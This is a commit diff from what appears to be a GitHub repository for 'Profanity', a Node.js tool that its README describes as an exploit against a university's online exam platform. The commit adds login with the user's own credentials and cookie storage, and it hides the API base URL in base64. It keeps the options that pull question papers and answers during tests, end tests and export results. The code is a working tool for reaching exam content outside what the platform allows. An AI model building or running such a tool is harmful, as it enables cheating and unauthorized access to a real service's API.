Reviving this project with auth

Turned out the vendor's API works same as before, but now with jwt authentication. Hence, user can be tracked by traffic usage. Works, but risky with own credentials; Use it on your own risk
algocry · Oct 1, 2024 · edeed81 · edeed81
1 parent bcfc8e6
commit edeed81
Show file tree

Hide file tree

Showing 8 changed files with 72 additions and 83 deletions.
diff --git a/App.js b/App.js
@@ -3,30 +3,56 @@ const oneres = require("./src/getOneResult");
 const que = require("./src/getQuestions");
 const endt = require("./src/endTest");
 const anst = require("./src/getAnswer");
+const prompt = require("prompt-sync")({ sigint: true });
+const fs = require('fs');
 
+var fetch_cookies = async (username, password) => {
+    var x = await fetch("https://oas.lpu.in/Home/NewLoginMethod", {
+        "headers": {
+            "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8",
+            "content-type": "application/x-www-form-urlencoded",
+            "Referer": "https://oas.lpu.in/",
+        },
+        "body": `LoginId=${username}&Password=${encodeURIComponent(password)}`,
+        "method": "POST",
+        redirect: 'manual',
+    });
+    var resp = await x.headers.get('Set-Cookie');
+    return resp.split('OASvalue=').pop().split(';')[0];
+}
 
-console.log("Profanity v1.0.1");
-console.log("Author: 0x0is1");
+const main = async () => {
+    console.log("Profanity v1.0.1");
+    console.log("Author: 0x0is1");
 
-switch (parseInt(process.argv[2])) {
-    case 1:
-        dexp.exportData(null);
-        break;
-    case 2:
-        oneres.getOneResult(null);
-        break;
-    case 3:
-        que.getQuestions(null);
-        break;
-    case 4:
-        endt.endTest(null);
-        break;
-    case 5:
-        anst.getAnswer(null);
-        break;
-    case 6:
-        anst.getAnswerNNA(null);
-        break;
-    default:
-        console.log("Wrong option selected.")
-}
+    var registrat = prompt('Enter Your registration number: ');
+    var passw = prompt.hide('Enter your password: ');
+
+    const cookies = await fetch_cookies(registrat, passw);
+    fs.writeFileSync('./src/creds/token.txt', cookies);
+
+    switch (parseInt(process.argv[2])) {
+        case 1:
+            dexp.exportData(passw, registrat);
+            break;
+        case 2:
+            oneres.getOneResult(registrat);
+            break;
+        case 3:
+            que.getQuestions(registrat);
+            break;
+        case 4:
+            endt.endTest(registrat);
+            break;
+        case 5:
+            anst.getAnswer(registrat);
+            break;
+        case 6:
+            anst.getAnswerNNA(registrat);
+            break;
+        default:
+            console.log("Wrong option selected.");
+    }
+};
+
+main();
diff --git a/README.md b/README.md
@@ -3,13 +3,16 @@
 [![NodeJS with Webpack](https://github.com/0x0is1/profanity/actions/workflows/webpack.yml/badge.svg)](https://github.com/0x0is1/profanity/actions/workflows/webpack.yml)
 [![Say Thanks!](https://img.shields.io/badge/Say%20Thanks-!-1EAEDB.svg)](https://saythanks.io/to/[email protected])
 ![Version](https://img.shields.io/badge/Version-1.0.1-red)
-![Deprecation](https://img.shields.io/badge/Deprecation-Yes-orange)
+![Deprecation](https://img.shields.io/badge/Deprecation-No-green)
 
 ```js
 [18-03-2023]
 ISSUE HAS BEEN DISCLOSED AND FIXED BY VENDOR
 THIS EXPLOIT DOES NOT AFFECT THE VENDOR ANYMORE
 SO MAKING IT PUBLIC
+[25-09-2024]
+REVIVING THIS PROJECT WITH AUTHENTICATION
+AND USERS RESPONSBILITY
 ```
 This repository contains exploit for bug in Authetication and API Access of the affected platform. This exploit has been released without the original vendor's prior knowledege as of now.
 

diff --git a/run.bat b/run.bat
@@ -7,39 +7,13 @@ if exist node_modules\ (
   echo npm packages not found. Installing...
   npm install
 )
-echo 1. Get one result
-echo 2. Get all results
+echo 1. Get all result
+echo 2. Get one results
 echo 3. Get Question Paper
 echo 4. End test
 echo 5. Get answer - question navigation allowed
 echo 6. Get answer - question navigation not allowed
 
 set /p input=Select action: 
-if %input%==1 (
-    npm run result
-    pause
-) 
-if %input%==2 (
-    npm run export
-    pause
-) 
-if %input%==3 (
-    npm run question
-    pause
-)
-if %input%==4 (
-    npm run end
-    pause
-)
-if %input%==5 (
-    npm run answer
-    pause
-)
-if %input%==6 (
-    npm run answern
-    pause
-) else (
-    echo Wrong option selected
-    pause
-)
+node App.js %input%
 pause
diff --git a/src/creds/.gitkeep b/src/creds/.gitkeep
diff --git a/src/exportData.js b/src/exportData.js
@@ -48,13 +48,16 @@ function export2excel(filename, data) {
         console.log(e);
     }
 }
-async function exportData(tem=1) {
+async function exportData(tpw, tem=1) {
+    let registrat;
+    let passw;
     if (tem === null) {
-        var registrat = prompt('Enter Your registration number: ');
-        var passw = prompt.hide('Enter your password: ');
+        registrat = prompt('Enter Your registration number: ');
+        passw = prompt.hide('Enter your password: ');
     }
     else {
-        return;
+        registrat = tem;
+        passw = tpw;
     }
 
     await loginHandler.login(registrat, passw, 330).then(async data => {

diff --git a/src/getAnswer.js b/src/getAnswer.js
@@ -16,10 +16,7 @@ async function getAnswer(rno) {
             for (var [i, j] of data.entries()) {
                 console.log(`[${i + 1}] ${j.TestName}`);
             }
-            if (rno === null) {
-                var selid = prompt('Select test to get answers: ');
-            }
-            else selid = 1;
+            var selid = prompt('Select test to get answers: ');
             var tid = data[selid-1].TestId;
 
             // var set = prompt('Enter set number: ');

diff --git a/src/getQuestions.js b/src/getQuestions.js
@@ -91,26 +91,20 @@ var htmlBoilerPlate = `<html><head><title>Profanity</title><style>${stylesheet}<
 async function getQuestions(regs = 12114480) {
     if (regs === null) {
         var reg = prompt('Enter registration number to get tests: ') | regs;
-        console.log("[1] From Attempted\n[2] To attempt")
-        var fun_idx = prompt("Select from which category you want to access tests (Default: 1): ")
     }
     else {
-        var fun_idx = 1;
         var reg = regs;
     }
+    console.log("[1] From Attempted\n[2] To attempt")
+    var fun_idx = prompt("Select from which category you want to access tests (Default: 1): ")
     var fun2exec = [parseOAS.fetch_attempted, parseOAS.fetch_2attempt][parseInt(fun_idx) - 1];
     var test_ids = [];
     await fun2exec(reg).then(async data => {
         for (let [t_idx, test] of data.entries()) {
             console.log(`[${t_idx+1}] ${test.TestName}`);
             test_ids.push(test.TestId);
         }
-        if (regs === null) {
-            var test_idx = prompt("Select test to get questions: ");
-        }
-        else {
-            var test_idx = 1;
-        }
+        var test_idx = prompt("Select test to get questions: ");
         var test_id = test_ids[parseInt(test_idx - 1)];
         await parseOAS.fetchSet(test_id, reg).then(async setData => {
             const set = JSON.parse(setData)[0].SetNo;
@@ -140,22 +134,12 @@ async function getQuestions(regs = 12114480) {
                                 htmlBoilerPlate += `</div>`;
                             }
                             var answer = "Not Available";
-                            await parseOAS.fetch_answers(test_id = test_id, reg).then(async ans_data => {
-                                try {
-                                    answer = ans_data[qid_idx].RightOption;
-                                }
-                                catch (e) {
-                                    answer = "Not Available";
-                                }
-                            });
                             htmlBoilerPlate += `<div class="c_answer">Correct Answer: <b>${answer}</b></div></div>`;
                         });
                     });
                 }
                 htmlBoilerPlate += `</body></html>`;
-                if (regs === null) {
-                    writeData(`${test_id}-${uuidv4()}.pdf`, htmlBoilerPlate);
-                }
+                writeData(`${test_id}-${uuidv4()}.pdf`, htmlBoilerPlate);
             });
         });
     });

diff --git a/src/libs/parseOAS.js b/src/libs/parseOAS.js
@@ -1,13 +1,15 @@
 const fetch = require('node-fetch');
 const encd = require('./encryptHandler').encd;
-
+const fs = require('fs')
 const BASEURL = Buffer.from('aHR0cHM6Ly9vYXMubHB1LmluL2FwaS9PbmxpbmVFeGFt', 'base64').toString('ascii');
 
 const headers = () => {
+    const oasToken = fs.readFileSync('./src/creds/token.txt', { encoding: 'utf8', flag: 'r' })
     return {
         "content-type": "application/json; charset=utf-8",
         "x-requested-with": "XMLHttpRequest",
         "Referer": BASEURL,
+        "cookie": `ASP.NET_SessionId=a; OASvalue=${oasToken}`,
     }
 };